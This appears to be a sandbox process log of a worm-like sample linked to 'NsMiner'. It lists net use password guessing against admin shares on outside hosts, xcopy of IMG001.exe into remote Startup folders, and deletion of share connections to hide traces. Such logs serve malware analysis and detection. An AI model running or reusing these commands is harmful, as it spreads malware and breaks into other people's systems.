C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"admin"6⤵PID:3088
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"admin"6⤵
- System Location Discovery: System Language Discovery
PID:5996
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6368
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "admin" /user:"admin"6⤵PID:6816
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "admin" /user:"admin"6⤵PID:4372
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5020
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0208" /user:"admin"6⤵
- System Location Discovery: System Language Discovery
PID:6932
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0208" /user:"admin"6⤵PID:3348
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5700
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"admin"6⤵PID:4324
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"admin"6⤵
- System Location Discovery: System Language Discovery
PID:5036
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3448
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"àäìèíèñòðàòîð"6⤵PID:4464
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"àäìèíèñòðàòîð"6⤵PID:2376
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5368
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"àäìèíèñòðàòîð"6⤵PID:4708
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"àäìèíèñòðàòîð"6⤵PID:5656
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2648
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"àäìèíèñòðàòîð"6⤵PID:876
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"àäìèíèñòðàòîð"6⤵PID:3524
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5168
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"6⤵PID:2124
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"6⤵PID:5016
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5768
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0208" /user:"àäìèíèñòðàòîð"6⤵PID:6888
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0208" /user:"àäìèíèñòðàòîð"6⤵
- System Location Discovery: System Language Discovery
PID:6924
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3544
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"àäìèíèñòðàòîð"6⤵PID:5328
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"àäìèíèñòðàòîð"6⤵PID:3552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\136.243.76.173|find /i " "6⤵PID:2280
-
C:\Windows\SysWOW64\net.exenet view \\136.243.76.1737⤵
- Discovers systems in the same network
PID:6872
-
-
C:\Windows\SysWOW64\find.exefind /i " "7⤵PID:5996
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:3872
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4532
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5600
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6368
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:1948
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:1332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:1432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7012
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:1892 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:6244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5732
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6904
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:4572
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:5908
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:2432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:3856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7064
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:2848
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:4960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\C$\1\IMG001.exe" "6⤵PID:1156
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\C$\1\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6064
-
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
- System Location Discovery: System Language Discovery
PID:6304
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:2912
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:6824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:3144
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4976
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:7120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5444
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:3452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5440
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5160
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:2088
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5628
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:692
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:4828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:5964
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:2612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5748
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:6136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:6860
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵PID:5972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.173\Users\1\IMG001.exe" "6⤵PID:4376
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.173\Users\1\IMG001.exe"7⤵PID:3700
-
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:5600
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1432
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6860
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "1" /user:"1"6⤵PID:4540
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "1" /user:"1"6⤵PID:1708
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6324
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "123" /user:"1"6⤵PID:2788
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "123" /user:"1"6⤵PID:7064
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:6852
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "1" /user:"1"6⤵PID:6548
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "1" /user:"1"6⤵PID:6236
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:3856
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "0208" /user:"1"6⤵PID:2204
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "0208" /user:"1"6⤵PID:8
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:6368
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ """" /user:"1"6⤵PID:692
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users """" /user:"1"6⤵PID:7064
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3696
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "0" /user:"136.243.76.173"6⤵PID:7032
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "0" /user:"136.243.76.173"6⤵PID:5716
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3036
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "1" /user:"136.243.76.173"6⤵PID:4376
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "1" /user:"136.243.76.173"6⤵PID:6180
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1704
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "123" /user:"136.243.76.173"6⤵PID:1284
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "123" /user:"136.243.76.173"6⤵PID:5540
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:7096
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "136.243.76.173" /user:"136.243.76.173"6⤵PID:3276
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "136.243.76.173" /user:"136.243.76.173"6⤵PID:3184
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5656
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "0208" /user:"136.243.76.173"6⤵PID:1148
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "0208" /user:"136.243.76.173"6⤵PID:3040
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4940
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ """" /user:"136.243.76.173"6⤵PID:1564
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users """" /user:"136.243.76.173"6⤵PID:3452
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6052
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "0" /user:"administrator"6⤵PID:3024
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "0" /user:"administrator"6⤵PID:3144
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6800
-
-
